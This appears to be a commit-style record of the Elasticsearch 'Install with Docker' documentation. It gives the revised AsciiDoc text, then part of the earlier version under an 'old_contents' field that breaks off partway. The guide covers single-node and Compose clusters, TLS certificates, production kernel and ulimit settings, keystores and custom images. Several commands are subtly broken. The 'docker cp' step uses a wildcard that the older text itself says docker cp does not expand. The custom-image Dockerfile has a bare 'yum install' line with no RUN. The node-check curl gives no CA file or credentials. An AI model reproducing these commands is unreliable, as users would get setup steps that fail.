Docker\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of the {es} Docker image has not yet been released.\n\nendif::[]\n\nIf you're starting a single-node {es} cluster in a Docker container, security\nwill be automatically enabled and configured for you. When you start {es} for\nthe first time, the following security configuration occurs automatically:\n\n* <<elasticsearch-security-certificates,Certificates and keys>> are generated\nfor the transport and HTTP layers.\n* The Transport Layer Security (TLS) configuration settings are written to\n`elasticsearch.yml`.\n* A password is generated for the `elastic` user.\n* An enrollment token is generated for {kib}.\n\nYou can then {kibana-ref}\/docker.html[start {kib}] and enter the enrollment\ntoken, which is valid for 30 minutes. This token automatically applies the\nsecurity settings from your {es} cluster, authenticates to {es} with the\n`kibana_system` user, and writes the security configuration to `kibana.yml`. \n\nThe following command starts a single-node {es} cluster for development or\ntesting.\n\n. Start {es} in Docker. 
A password is generated for the `elastic` user and\noutput to the terminal, plus an enrollment token for enrolling {kib}.\n+\n--\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,sh,subs=\"attributes\"]\n----\ndocker run --name es-node01 -p 9200:9200 -p 9300:9300 -it {docker-image}\n----\n\nendif::[]\n--\n+\nTIP: You might need to scroll back a bit in the terminal to view the password\nand enrollment token.\n\n. Copy the generated password and enrollment token and save them in a secure\nlocation. These values are shown only when you start {es} for the first time.\n+\n[NOTE]\n====\nIf you need to reset the password for the `elastic` user or other\nbuilt-in users, run the <<reset-password,`elasticsearch-reset-password`>> tool.\nThis tool is available in the {es} `\/bin` directory of the Docker container.\nFor example:\n\n[source,sh]\n----\ndocker exec -it es-node01 \/usr\/share\/elasticsearch\/bin\/elasticsearch-reset-password\n----\n====\n\n. Copy the `http_ca.crt` security certificate from your Docker container to\nyour local machine.\n+\n[source,sh]\n----\ndocker cp es-node01:\/usr\/share\/elasticsearch\/config\/tls_auto_config_*\/http_ca.crt .\n----\n\n. Open a new terminal and verify that you can connect to your {es} cluster by\nmaking an authenticated call, using the `http_ca.crt` file that you copied from\nyour Docker container. Enter the password for the `elastic` user when prompted.\n+\n[source,sh]\n----\ncurl --cacert http_ca.crt -u elastic https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[elasticsearch-security-certificates]]\n===== Security certificates and keys\n\nWhen you start {es} for the first time, the following certificates and keys are\ngenerated in the\n`\/usr\/share\/elasticsearch\/config\/tls_auto_config_initial_node_<timestamp>`\ndirectory in the Docker container, and allow you to connect a {kib} instance\nto your secured {es} cluster and encrypt internode communication. The files are\nlisted here for reference.\n\n`http_ca.crt`::\nThe CA certificate that is used to sign the certificates for the HTTP layer of\nthis {es} cluster.\n\n`http_keystore_local_node.p12`::\nKeystore that contains the key and certificate for the HTTP layer for this node.\n\n`transport_keystore_all_nodes.p12`::\nKeystore that contains the key and certificate for the transport layer for all\nthe nodes in your cluster.\n\n[[docker-compose-file]]\n==== Start a multi-node cluster with Docker Compose\n\nWhen defining multiple nodes in a `docker-compose.yml` file, you'll need to\nexplicitly enable and configure security so that {es} doesn't try to generate a\npassword for the `elastic` user on every node. \n\n===== Prepare the environment\n\nThe following example uses Docker Compose to start a three-node {es} cluster.\nCreate each of the following files inside of a new directory. 
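For example, you might create and enter a scratch directory first (a sketch; the directory name is arbitrary):\n\n[source,sh]\n----\nmkdir es-docker-cluster && cd es-docker-cluster\n----\n\n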
Copy and paste the\ncontents of each example into the appropriate file as described in the\nfollowing sections:\n\n* <<docker-instances-yml,`instances.yml`>>\n* <<docker-env,`.env`>>\n* <<docker-create-certs,`create-certs.yml`>>\n* <<docker-docker-compose,`docker-compose.yml`>>\n\n[[docker-instances-yml]]\n[discrete]\n===== `instances.yml`\n\nWhen you run the example, {es} uses this file to create a three-node cluster.\nThe nodes are named `es01`, `es02`, and `es03`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::instances.yml[]\n----\nendif::[]\n--\n\n[[docker-env]]\n[discrete]\n===== `.env`\n\nThe `.env` file sets environment variables that are used when you run the\nexample. Ensure that you specify a strong password for the `elastic` user with\nthe `ELASTIC_PASSWORD` variable. This variable is referenced by the\n`docker-compose.yml` file.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::.env[]\n----\nendif::[]\n--\n\n`COMPOSE_PROJECT_NAME`:: Adds an `es_` prefix for all volumes and networks\ncreated by `docker-compose`.\n\n`CERTS_DIR`:: Specifies the path inside the Docker image where {es} expects the\nsecurity certificates.\n\n`ELASTIC_PASSWORD`:: Sets the initial password for the `elastic` user.\n\n[discrete]\n[[docker-create-certs]]\n===== `create-certs.yml`\n\nThe `create-certs.yml` file includes a script that generates node certificates\nand a certificate authority (CA) certificate and key where {es} expects them.\nThese certificates and key are placed in a Docker volume named `es_certs`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::create-certs.yml[]\n----\nendif::[]\n--\n\n[[docker-docker-compose]]\n[discrete]\n===== `docker-compose.yml`\n\nThe `docker-compose.yml` file defines configuration settings for each of your\n{es} nodes.\n\nNOTE: This sample `docker-compose.yml` file uses the `ES_JAVA_OPTS`\nenvironment variable to manually set the heap size to 512MB. We do not recommend\nusing `ES_JAVA_OPTS` in production.\nSee <<docker-set-heap-size,manually set the heap size>>.\n\nThis configuration exposes port `9200` on all network interfaces. Given how\nDocker manipulates `iptables` on Linux, this means that your {es} cluster is\npublicly accessible, potentially ignoring any firewall settings. If you don't\nwant to expose port `9200` and instead use a reverse proxy, replace `9200:9200`\nwith `127.0.0.1:9200:9200` in the `docker-compose.yml` file. 
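For example, the relevant `ports` entry for a node would then look like this (a sketch of only the fragment to change, following the conventions of the compose file above):\n\n[source,yaml]\n----\n    ports:\n      - \"127.0.0.1:9200:9200\"\n----\n\n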
{es} will then only\nbe accessible from the host machine itself.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::docker-compose.yml[]\n----\nendif::[]\n--\n\n===== Start your cluster with security enabled and configured\n\nThis sample Docker Compose file starts a three-node {es} cluster.\n\nThe https:\/\/docs.docker.com\/storage\/volumes[Docker named volumes]\n`data01`, `data02`, and `data03` store the node data directories so that the\ndata persists across restarts. If they don't already exist, running\n`docker-compose` creates these volumes.\n\n[[docker-generate-certificates]]\n. Generate the certificates. You only need to run this command one time:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml run --rm create_certs\n----\n\n. Start your {es} nodes with TLS configured on the transport layer:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n+\nNode `es01` listens on `localhost:9200` and `es02` and `es03` talk to `es01`\nover a Docker network.\n\n. Access the {es} API over TLS using the bootstrapped password for the `elastic`\nuser that you specified in the `.env` file:\n+\n[\"source\",\"sh\",subs=\"attributes\"]\n----\ndocker run --rm -v es_certs:\/certs --network=es_default {docker-image} curl --cacert \/certs\/ca\/ca.crt -u elastic:<password> https:\/\/es01:9200\n----\n\/\/ NOTCONSOLE\n+\n--\n`es_certs`:: The name of the volume that the script in `create-certs.yml`\ncreates to hold your certificates.\n\n`<password>`:: The password for the `elastic` user, defined by the\n`ELASTIC_PASSWORD` variable in the `.env` file.\n--\n\n. Submit a `_cat\/nodes` request to check that the nodes are up and running:\n+\n[source,sh]\n----\ncurl -X GET \"https:\/\/localhost:9200\/_cat\/nodes?v=true&pretty\"\n----\n\/\/ NOTCONSOLE\n\nLog messages go to the console and are handled by the configured Docker logging\ndriver. By default, you can access logs with `docker logs`. If you prefer that\nthe {es} container write logs to disk, set the `ES_LOG_STYLE` environment\nvariable to `file`. This causes {es} to use the same logging configuration as\nother {es} distribution formats.\n\nIf you need to generate a new password for the `elastic` user or any of the\nbuilt-in users, use the `elasticsearch-reset-password` tool:\n\nWARNING: Windows users not running PowerShell must remove all backslashes (`\\`)\nand join lines in the following command.\n\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/elasticsearch-reset-password \\\nauto --batch \\\n--url https:\/\/localhost:9200\"\n----\n\n===== Stop the cluster\nTo stop the cluster, run `docker-compose down`. The data in the Docker volumes\nis preserved and loaded when you restart the cluster with `docker-compose up`.\n\n--\n[\"source\",\"sh\"]\n----\ndocker-compose down\n----\n--\n\nTo **delete the data volumes** when you stop the cluster, specify the `-v`\noption:\n\n[\"source\",\"sh\"]\n----\ndocker-compose down -v\n----\n\nWARNING: Deleting data volumes will remove the generated security certificates\nfor your nodes. You will need to run `docker-compose` and \n<<docker-generate-certificates,regenerate the security certificates>> before\nstarting your cluster.\n\n===== Next steps\n\nYou now have a test {es} environment set up. 
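As a quick sanity check, you could also query the cluster health endpoint, reusing the helper-container pattern shown above (a sketch; `<password>` is your `ELASTIC_PASSWORD` value):\n\n[\"source\",\"sh\",subs=\"attributes\"]\n----\ndocker run --rm -v es_certs:\/certs --network=es_default {docker-image} curl --cacert \/certs\/ca\/ca.crt -u elastic:<password> \"https:\/\/es01:9200\/_cluster\/health?pretty\"\n----\n\n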
Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[docker-prod-prerequisites]]\n==== Using the Docker images in production\n\nThe following requirements and recommendations apply when running {es} in Docker in production.\n\n===== Set `vm.max_map_count` to at least `262144`\n\nThe `vm.max_map_count` kernel setting must be set to at least `262144` for production use.\n\nHow you set `vm.max_map_count` depends on your platform:\n\n* Linux\n+\n--\nThe `vm.max_map_count` setting should be set permanently in `\/etc\/sysctl.conf`:\n[source,sh]\n--------------------------------------------\ngrep vm.max_map_count \/etc\/sysctl.conf\nvm.max_map_count=262144\n--------------------------------------------\n\nTo apply the setting on a live system, run:\n\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* macOS with https:\/\/docs.docker.com\/docker-for-mac[Docker for Mac]\n+\n--\nThe `vm.max_map_count` setting must be set within the xhyve virtual machine:\n\n. From the command line, run:\n+\n[source,sh]\n--------------------------------------------\nscreen ~\/Library\/Containers\/com.docker.docker\/Data\/vms\/0\/tty\n--------------------------------------------\n\n. Press enter and use `sysctl` to configure `vm.max_map_count`:\n+\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n\n. To exit the `screen` session, type `Ctrl a d`.\n--\n\n* Windows and macOS with https:\/\/www.docker.com\/products\/docker-desktop[Docker Desktop]\n+\n--\nThe `vm.max_map_count` setting must be set via docker-machine:\n\n[source,sh]\n--------------------------------------------\ndocker-machine ssh\nsudo sysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* Windows with https:\/\/docs.docker.com\/docker-for-windows\/wsl[Docker Desktop WSL 2 backend]\n+\n--\nThe `vm.max_map_count` setting must be set in the docker-desktop container:\n\n[source,sh]\n--------------------------------------------\nwsl -d docker-desktop\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n===== Configuration files must be readable by the `elasticsearch` user\n\nBy default, {es} runs inside the container as user `elasticsearch` using\nuid:gid `1000:0`.\n\nIMPORTANT: One exception is https:\/\/docs.openshift.com\/container-platform\/3.6\/creating_images\/guidelines.html#openshift-specific-guidelines[Openshift],\nwhich runs containers using an arbitrarily assigned user ID.\nOpenshift presents persistent volumes with the gid set to `0`, which works without any adjustments.\n\nIf you are bind-mounting a local directory or file, it must be readable by the `elasticsearch` user.\nIn addition, this user must have write access to the <<path-settings,config, data and log dirs>>\n({es} needs write access to the `config` directory so that it can generate a keystore).\nA good strategy is to grant group access to gid `0` for the local directory.\n\nFor example, to prepare a local directory for storing data through a bind-mount:\n\n[source,sh]\n--------------------------------------------\nmkdir esdatadir\nchmod g+rwx esdatadir\nchgrp 0 esdatadir\n--------------------------------------------\n\nYou can also run an {es} container using both a custom UID and GID. 
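For example, such an invocation might look like the following sketch (the UID is arbitrary; the `--group-add 0` flag is explained by the caveat that follows):\n\n[source,sh]\n--------------------------------------------\ndocker run --user 1002:0 --group-add 0 <various parameters> {docker-image}\n--------------------------------------------\n\n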
Unless you\nbind-mount each of the `config`, `data` and `logs` directories, you must pass\nthe command line option `--group-add 0` to `docker run`. This ensures that the user\nunder which {es} is running is also a member of the `root` (GID 0) group inside the\ncontainer.\n\n===== Increase ulimits for nofile and nproc\n\nIncreased ulimits for <<setting-system-settings,nofile>> and <<max-number-threads-check,nproc>>\nmust be available for the {es} containers.\nVerify the https:\/\/github.com\/moby\/moby\/tree\/ea4d1243953e6b652082305a9c3cda8656edab26\/contrib\/init[init system]\nfor the Docker daemon sets them to acceptable values.\n\nTo check the Docker daemon defaults for ulimits, run:\n\n[source,sh]\n--------------------------------------------\ndocker run --rm centos:8 \/bin\/bash -c 'ulimit -Hn && ulimit -Sn && ulimit -Hu && ulimit -Su'\n--------------------------------------------\n\nIf needed, adjust them in the Daemon or override them per container.\nFor example, when using `docker run`, set:\n\n[source,sh]\n--------------------------------------------\n--ulimit nofile=65535:65535\n--------------------------------------------\n\n===== Disable swapping\n\nSwapping needs to be disabled for performance and node stability.\nFor information about ways to do this, see <<setup-configuration-memory>>.\n\nIf you opt for the `bootstrap.memory_lock: true` approach,\nyou also need to define the `memlock: true` ulimit in the\nhttps:\/\/docs.docker.com\/engine\/reference\/commandline\/dockerd\/#default-ulimits[Docker Daemon],\nor explicitly set for the container as shown in the <<docker-compose-file, sample compose file>>.\nWhen using `docker run`, you can specify:\n\n[source,sh]\n----\n-e \"bootstrap.memory_lock=true\" --ulimit memlock=-1:-1\n----\n\n===== Randomize published ports\n\nThe image https:\/\/docs.docker.com\/engine\/reference\/builder\/#\/expose[exposes]\nTCP ports 9200 and 9300. For production clusters, randomizing the\npublished ports with `--publish-all` is recommended,\nunless you are pinning one container per host.\n\n[[docker-set-heap-size]]\n===== Manually set the heap size\n\nBy default, {es} automatically sizes JVM heap based on a node's\n<<node-roles,roles>> and the total memory available to the node's container. We\nrecommend this default sizing for most production environments. If needed, you\ncan override default sizing by manually setting JVM heap size.\n\nTo manually set the heap size in production, bind mount a <<set-jvm-options,JVM\noptions>> file under `\/usr\/share\/elasticsearch\/config\/jvm.options.d` that\nincludes your desired <<set-jvm-heap-size,heap size>> settings.\n\nFor testing, you can also manually set the heap size using the `ES_JAVA_OPTS`\nenvironment variable. For example, to use 16GB, specify `-e\nES_JAVA_OPTS=\"-Xms16g -Xmx16g\"` with `docker run`. The `ES_JAVA_OPTS` variable\noverrides all other JVM options. We do not recommend using `ES_JAVA_OPTS` in production. The\n`docker-compose.yml` file above sets the heap size to 512MB.\n\n===== Pin deployments to a specific image version\n\nPin your deployments to a specific version of the {es} Docker image. For\nexample +docker.elastic.co\/elasticsearch\/elasticsearch:{version}+.\n\n===== Always bind data volumes\n\nYou should use a volume bound on `\/usr\/share\/elasticsearch\/data` for the following reasons:\n\n. The data of your {es} node won't be lost if the container is killed\n\n. 
{es} is I\/O sensitive and the Docker storage driver is not ideal for fast I\/O\n\n. It allows the use of advanced\nhttps:\/\/docs.docker.com\/engine\/extend\/plugins\/#volume-plugins[Docker volume plugins]\n\n===== Avoid using `loop-lvm` mode\n\nIf you are using the devicemapper storage driver, do not use the default `loop-lvm` mode.\nConfigure docker-engine to use\nhttps:\/\/docs.docker.com\/engine\/userguide\/storagedriver\/device-mapper-driver\/#configure-docker-with-devicemapper[direct-lvm].\n\n===== Centralize your logs\n\nConsider centralizing your logs by using a different\nhttps:\/\/docs.docker.com\/engine\/admin\/logging\/overview\/[logging driver]. Also\nnote that the default json-file logging driver is not ideally suited for\nproduction use.\n\n[[docker-configuration-methods]]\n==== Configuring {es} with Docker\n\nWhen you run in Docker, the <<config-files-location,{es} configuration files>> are loaded from\n`\/usr\/share\/elasticsearch\/config\/`.\n\nTo use custom configuration files, you <<docker-config-bind-mount, bind-mount the files>>\nover the configuration files in the image.\n\nYou can set individual {es} configuration parameters using Docker environment variables.\nThe <<docker-compose-file, sample compose file>> and the\n<<docker-cli-run-dev-mode, single-node example>> use this method. You can\nuse the setting name directly as the environment variable name. If\nyou cannot do this, for example because your orchestration platform forbids\nperiods in environment variable names, then you can use an alternative\nstyle by converting the setting name as follows.\n\n. Change the setting name to uppercase\n. Prefix it with `ES_SETTING_`\n. Escape any underscores (`_`) by duplicating them\n. Convert all periods (`.`) to underscores (`_`)\n\nFor example, `-e bootstrap.memory_lock=true` becomes\n`-e ES_SETTING_BOOTSTRAP_MEMORY__LOCK=true`.\n\nYou can use the contents of a file to set the value of the\n`ELASTIC_PASSWORD` or `KEYSTORE_PASSWORD` environment variables, by\nsuffixing the environment variable name with `_FILE`. This is useful for\npassing secrets such as passwords to {es} without specifying them directly.\n\nFor example, to set the {es} bootstrap password from a file, you can bind mount the\nfile and set the `ELASTIC_PASSWORD_FILE` environment variable to the mount location.\nIf you mount the password file to `\/run\/secrets\/bootstrapPassword.txt`, specify:\n\n[source,sh]\n--------------------------------------------\n-e ELASTIC_PASSWORD_FILE=\/run\/secrets\/bootstrapPassword.txt\n--------------------------------------------\n\nYou can override the default command for the image to pass {es} configuration\nparameters as command line options. 
For example:\n\n[source,sh]\n--------------------------------------------\ndocker run <various parameters> bin\/elasticsearch -Ecluster.name=mynewclustername\n--------------------------------------------\n\nWhile bind-mounting your configuration files is usually the preferred method in production,\nyou can also <<_c_customized_image, create a custom Docker image>>\nthat contains your configuration.\n\n[[docker-config-bind-mount]]\n===== Mounting {es} configuration files\n\nCreate custom config files and bind-mount them over the corresponding files in the Docker image.\nFor example, to bind-mount `custom_elasticsearch.yml` with `docker run`, specify:\n\n[source,sh]\n--------------------------------------------\n-v full_path_to\/custom_elasticsearch.yml:\/usr\/share\/elasticsearch\/config\/elasticsearch.yml\n--------------------------------------------\n\nIf you bind-mount a custom `elasticsearch.yml` file, ensure it includes the\n`network.host: 0.0.0.0` setting. This setting ensures the node is reachable for\nHTTP and transport traffic, provided its ports are exposed. The Docker image's\nbuilt-in `elasticsearch.yml` file includes this setting by default.\n\nIMPORTANT: The container **runs {es} as user `elasticsearch` using\nuid:gid `1000:0`**. Bind mounted host directories and files must be accessible by this user,\nand the data and log directories must be writable by this user.\n\n[[docker-keystore-bind-mount]]\n===== Create an encrypted {es} keystore\n\nBy default, {es} will auto-generate a keystore file for <<secure-settings,secure\nsettings>>. This file is obfuscated but not encrypted.\n\nTo encrypt your secure settings with a password and have them persist outside\nthe container, use a `docker run` command to manually create the keystore\ninstead. The command must:\n\n* Bind-mount the `config` directory. The command will create an\n `elasticsearch.keystore` file in this directory. To avoid errors, do\n not directly bind-mount the `elasticsearch.keystore` file.\n* Use the `elasticsearch-keystore` tool with the `create -p` option. You'll be\n prompted to enter a password for the keystore.\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\nFor example:\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore create -p\n----\n\nYou can also use a `docker run` command to add or update secure settings in the\nkeystore. You'll be prompted to enter the setting values. If the keystore is\nencrypted, you'll also be prompted to enter the keystore password.\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore \\\nadd my.secure.setting \\\nmy.other.secure.setting\n----\nendif::[]\n\nIf you've already created the keystore and don't need to update it, you can\nbind-mount the `elasticsearch.keystore` file directly. You can use the\n`KEYSTORE_PASSWORD` environment variable to provide the keystore password to the\ncontainer at startup. 
For example, a `docker run` command might have the\nfollowing options:\n\n[source,sh]\n----\n-v full_path_to\/config\/elasticsearch.keystore:\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\n-e KEYSTORE_PASSWORD=mypassword\n----\n\n[[_c_customized_image]]\n===== Using custom Docker images\nIn some environments, it might make more sense to prepare a custom image that contains\nyour configuration. A `Dockerfile` to achieve this might be as simple as:\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --chown=elasticsearch:elasticsearch elasticsearch.yml \/usr\/share\/elasticsearch\/config\/\n--------------------------------------------\n\nYou could then build and run the image with:\n\n[source,sh]\n--------------------------------------------\ndocker build --tag=elasticsearch-custom .\ndocker run -ti -v \/usr\/share\/elasticsearch\/data elasticsearch-custom\n--------------------------------------------\n\nSome plugins require additional security permissions.\nYou must explicitly accept them either by:\n\n* Attaching a `tty` when you run the Docker image and allowing the permissions when prompted.\n* Inspecting the security permissions and accepting them (if appropriate) by adding the `--batch` flag to the plugin install command.\n\nSee {plugins}\/_other_command_line_parameters.html[Plugin management]\nfor more information.\n\nThe {es} Docker image only includes what is required to run {es}, and does\nnot provide a package manager. It is possible to add additional utilities\nwith a multi-phase Docker build. You must also copy any dependencies, for\nexample shared libraries.\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM centos:8 AS builder\nyum install -y some-package\n\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --from=builder \/usr\/bin\/some-utility \/usr\/bin\/\nCOPY --from=builder \/usr\/lib\/some-lib.so \/usr\/lib\/\n--------------------------------------------\n\nYou should use `centos:8` as a base in order to avoid incompatibilities.\nUse http:\/\/man7.org\/linux\/man-pages\/man1\/ldd.1.html[`ldd`] to list the\nshared libraries required by a utility.\n\n[discrete]\n[[troubleshoot-docker-errors]]\n==== Troubleshoot Docker errors for {es}\n\nHere\u2019s how to resolve common errors when running {es} with Docker.\n\n===== elasticsearch.keystore is a directory\n\n[source,txt]\n----\nException in thread \"main\" org.elasticsearch.bootstrap.BootstrapException: java.io.IOException: Is a directory: SimpleFSIndexInput(path=\"\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\") Likely root cause: java.io.IOException: Is a directory\n----\n\nA <<docker-keystore-bind-mount,keystore-related>> `docker run` command attempted\nto directly bind-mount an `elasticsearch.keystore` file that doesn't exist. If\nyou use the `-v` or `--volume` flag to mount a file that doesn't exist, Docker\ninstead creates a directory with the same name.\n\nTo resolve this error:\n\n. Delete the `elasticsearch.keystore` directory in the `config` directory.\n. Update the `-v` or `--volume` flag to point to the `config` directory path\n rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. 
Retry the command.\n\n===== elasticsearch.keystore: Device or resource busy\n\n[source,txt]\n----\nException in thread \"main\" java.nio.file.FileSystemException: \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore.tmp -> \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore: Device or resource busy\n----\n\nA `docker run` command attempted to <<docker-keystore-bind-mount,update the\nkeystore>> while directly bind-mounting the `elasticsearch.keystore` file. To\nupdate the keystore, the container requires access to other files in the\n`config` directory, such as `keystore.tmp`.\n\nTo resolve this error:\n\n. Update the `-v` or `--volume` flag to point to the `config` directory\n path rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.","old_contents":"[[docker]]\n=== Install {es} with Docker\n\n{es} is also available as Docker images. Starting with version 8.0.0, these\nare based upon a tiny core of essential files. Prior versions used\nhttps:\/\/hub.docker.com\/_\/centos\/[centos:8] as the base image.\n\nA list of all published Docker images and tags is available at\nhttps:\/\/www.docker.elastic.co[www.docker.elastic.co]. The source files\nare in\nhttps:\/\/github.com\/elastic\/elasticsearch\/blob\/{branch}\/distribution\/docker[GitHub].\n\ninclude::license.asciidoc[]\n\nStarting in {es} 8.0, security is enabled by default. With security enabled,\n{stack} {security-features} require TLS encryption for the transport networking\nlayer, or your cluster will fail to start.\n\n==== Install Docker Desktop or Docker Engine\n\nInstall the appropriate https:\/\/docs.docker.com\/get-docker\/[Docker application]\nfor your operating system.\n\nNOTE: Make sure that Docker is allotted at least 4GiB of memory. In Docker\nDesktop, you configure resource usage on the Advanced tab in Preferences (macOS)\nor Settings (Windows).\n\n==== Pull the {es} Docker image\n\nObtaining {es} for Docker is as simple as issuing a `docker pull` command\nagainst the Elastic Docker registry.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so no\nDocker image is currently available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n\n[source,sh,subs=\"attributes\"]\n----\ndocker pull {docker-repo}:{version}\n----\n\nendif::[]\n\nNow that you have the {es} Docker image, you can start a \n<<docker-cli-run-dev-mode,single-node>> or <<docker-compose-file,multi-node>>\ncluster.\n\n[[docker-cli-run-dev-mode]]\n==== Start a single-node cluster with Docker\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of the {es} Docker image has not yet been released.\n\nendif::[]\n\nIf you're starting a single-node {es} cluster in a Docker container, security\nwill be automatically enabled and configured for you. When you start {es} for\nthe first time, the following security configuration occurs automatically:\n\n* <<elasticsearch-security-certificates,Certificates and keys>> are generated\nfor the transport and HTTP layers.\n* The Transport Layer Security (TLS) configuration settings are written to\n`elasticsearch.yml`.\n* A password is generated for the `elastic` user.\n* An enrollment token is generated for {kib}.\n\nYou can then {kibana-ref}\/docker.html[start {kib}] and enter the enrollment\ntoken, which is valid for 30 minutes. 
This token automatically applies the\nsecurity settings from your {es} cluster, authenticates to {es} with the\n`kibana_system` user, and writes the security configuration to `kibana.yml`. \n\nThe following command starts a single-node {es} cluster for development or\ntesting.\n\n. Start {es} in Docker. A password is generated for the `elastic` user and\noutput to the terminal, plus an enrollment token for enrolling {kib}.\n+\n--\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,sh,subs=\"attributes\"]\n----\ndocker run --name es-node01 -p 9200:9200 -p 9300:9300 -it {docker-image}\n----\n\nendif::[]\n--\n+\nTIP: You might need to scroll back a bit in the terminal to view the password\nand enrollment token.\n\n. Copy the generated password and enrollment token and save them in a secure\nlocation. These values are shown only when you start {es} for the first time.\n+\n[NOTE]\n====\nIf you need to reset the password for the `elastic` user or other\nbuilt-in users, run the <<reset-password,`elasticsearch-reset-password`>> tool.\nThis tool is available in the {es} `\/bin` directory of the Docker container.\nFor example:\n\n[source,sh]\n----\ndocker exec -it es-node01 \/usr\/share\/elasticsearch\/bin\/elasticsearch-reset-password\n----\n====\n\n. Copy the `http_ca.crt` security certificate from your Docker container to\nyour local machine. Replace `<timestamp>` in the following command with the\ntimestamp portion of the `tls_auto_config_initial_node_<timestamp>` directory\nthat was created at startup (`docker cp` does not expand wildcards).\n+\n[source,sh]\n----\ndocker cp es-node01:\/usr\/share\/elasticsearch\/config\/tls_auto_config_initial_node_<timestamp>\/http_ca.crt .\n----\n\n. Open a new terminal and verify that you can connect to your {es} cluster by\nmaking an authenticated call, using the `http_ca.crt` file that you copied from\nyour Docker container. Enter the password for the `elastic` user when prompted.\n+\n[source,sh]\n----\ncurl --cacert http_ca.crt -u elastic https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[elasticsearch-security-certificates]]\n===== Security certificates and keys\n\nWhen you start {es} for the first time, the following certificates and keys are\ngenerated in the\n`\/usr\/share\/elasticsearch\/config\/tls_auto_config_initial_node_<timestamp>`\ndirectory in the Docker container, and allow you to connect a {kib} instance\nto your secured {es} cluster and encrypt internode communication. The files are\nlisted here for reference.\n\n`http_ca.crt`::\nThe CA certificate that is used to sign the certificates for the HTTP layer of\nthis {es} cluster.\n\n`http_keystore_local_node.p12`::\nKeystore that contains the key and certificate for the HTTP layer for this node.\n\n`transport_keystore_all_nodes.p12`::\nKeystore that contains the key and certificate for the transport layer for all\nthe nodes in your cluster.\n\n[[docker-compose-file]]\n==== Start a multi-node cluster with Docker Compose\n\nWhen defining multiple nodes in a `docker-compose.yml` file, you'll need to\nexplicitly enable and configure security so that {es} doesn't try to generate a\npassword for the `elastic` user on every node. \n\n===== Prepare the environment\n\nThe following example uses Docker Compose to start a three-node {es} cluster.\nCreate each of the following files inside of a new directory. 
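For example, a minimal sketch (the directory name `es-cluster` here is arbitrary):\n\n[source,sh]\n----\nmkdir es-cluster && cd es-cluster\ntouch instances.yml .env create-certs.yml docker-compose.yml\n----\n\n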
